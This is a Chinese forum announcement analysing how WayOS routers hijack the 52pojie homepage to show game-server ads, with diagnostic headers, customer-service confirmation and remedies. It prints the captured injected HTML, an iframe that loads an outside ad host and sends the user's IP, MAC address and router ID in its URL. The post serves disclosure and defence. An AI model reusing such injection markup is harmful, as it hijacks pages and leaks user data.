起因:
最近几天,陆续在论坛、邮箱、微博、微信公众号等渠道收到很多用户反馈,访问吾爱首页的时候直接显示私服网站内容或者空白内容,通过刷新或者清除缓存都无法解决。
现象:
访问论坛首页http://www.52pojie.cn,显示私服页面
排查:
1、一眼看去,感觉就是运营商劫持,所以先让反馈的同学们用诊断工具进行诊断,从诊断日志上看不太像DNS劫持,IP解析也正常,http返回的状态也是200,但实际相应的http头已经不是我们服务器返回的内容了,劫持返回的http头内容如下:
HTTP/1.1 200 OK
Content-Type: text/html;charset=gb2312
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Server: wys
Content-Length: 562
明显看起来就是被劫持替换成其他劫持内容了,就是上面看到的私服广告页面(上面标红的内容是一个关键,后面会说到)。
2、今天通过远程定位发现劫持后的网页源代码如下:
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=gb2312"><TITLE></TITLE><style>body {overflow: hidden; height: 100%; margin: 0px;}</style></HEAD><BODY><iframe id="wys_gg_http_index_jsp" style="z-index:-1;visibility: inherit; width: 100%; height: 100%;" src="http://jl2y.emu-sz.com:7066/adv/202.jsp?uid=HYG-1000_RG361612157097DA4E&ip=172.16.20.62&mac=B0-25-AA-1E-23-4E&js=0&surl=www.52pojie.cn/" frameBorder=0 scrolling="auto"></iframe></BODY></HTML>
这个劫持还把用户的路由器信息、IP地址、MAC地址和劫持的网址都上传了。
3、通过搜索Server: wys和wys_gg_http_index_jsp关键词信息,我们发现了很多相同劫持方法受害者发的帖子:
https://www.v2ex.com/t/96674
https://www.v2ex.com/t/78973
http://bbs.pxecn.com/thread-116285-1-1.html
看来这种劫持方式已经有很多年了,只是最近几天对吾爱下手了,顺藤摸瓜,发现这一切背后的黑手来自维盟路由器,也叫wayos(http://www.wayos.com),前面http头上的wys就是它们的缩写,在搜索引擎中搜索“wayos 劫持”,会看到非常多的用户反馈,通过搜索发现freebuf上还有一篇对路由器固件的简要技术分析http://www.freebuf.com/articles/terminal/113487.html ,D-Link路由器也用了wayos的固件,导致出现私服劫持,这次劫持的锅不用运营商背。
证实:
有了上面的基本分析,能确定是维盟路由器所为,为了落实我们让受害用户通过维盟网站上提供的客服电话进行反馈,维盟客服人员在电话中也毫不避讳的确认会劫持到私服网站,让用户打开路由器的远程功能,短短几秒钟就帮用户解决了劫持问题,通过多个用户验证,官方都通过设置路由器的方式,关闭了劫持,我们官方也进行了电话投诉咨询,客服给予的答复也是会劫持,但只能通过手动帮用户关闭路由器劫持功能,没有权限设置云端随时想劫持哪个网站的权限功能,只能尝试向“领导”反馈解决。
影响:
目前已经收到十几例反馈,并且劫持并不是随机,而是持续劫持,无法访问论坛,所以影响非常大,并且绝大多数都是小众宽带用户,小区宽带使用维盟路由器的概率很高,有的被劫持同学发现自己使用的不是维盟路由器,但也被劫持了,原因就是上层小区用了维盟路由器做分发(可以试试直接拨号来测试是否劫持,如果还劫持说明是上层路由器搞的)。劫持网站弹广告都小事,上传用户信息也不算太大事,但不包准出现恶意盗取用户密码网银设置钓鱼网站等恶意行为就是大事了,选择路由器需谨慎。
解决方案:
1、如果你用了维盟路由器,请拨打维盟客服热线 :4006125805 (09:00-22:00) http://www.wayos.com/about/contact.html ,告知客服路由器劫持了吾爱破解论坛www.52pojie.cn,官方客服会很热情的帮你解决问题。
2、如果你是小区这种小众宽带,也请拨打维盟客服热线 :4006125805 (09:00-22:00) http://www.wayos.com/about/contact.html ,告知客服路由器劫持了吾爱破解论坛www.52pojie.cn,看客服是否能直接处理,如果不行需要小区宽带的运营商,请和办理宽带的小区运营商来联系,让他们看这个帖子,通过联系客服来解决。
3、目前只有主页被劫持,其他页面还未劫持,临时可以通过http://www.52pojie.cn/forum.php页面访问。
4、我们会尽快上SSL,最近维护就是在做这方面的修改和测试,目前除了主站,其他二级域名已经全部SSL化了。
--官方论坛
www.52pojie.cn
--推荐给朋友
公众微信号:吾爱破解论坛
或搜微信号:pojie_52
文章评论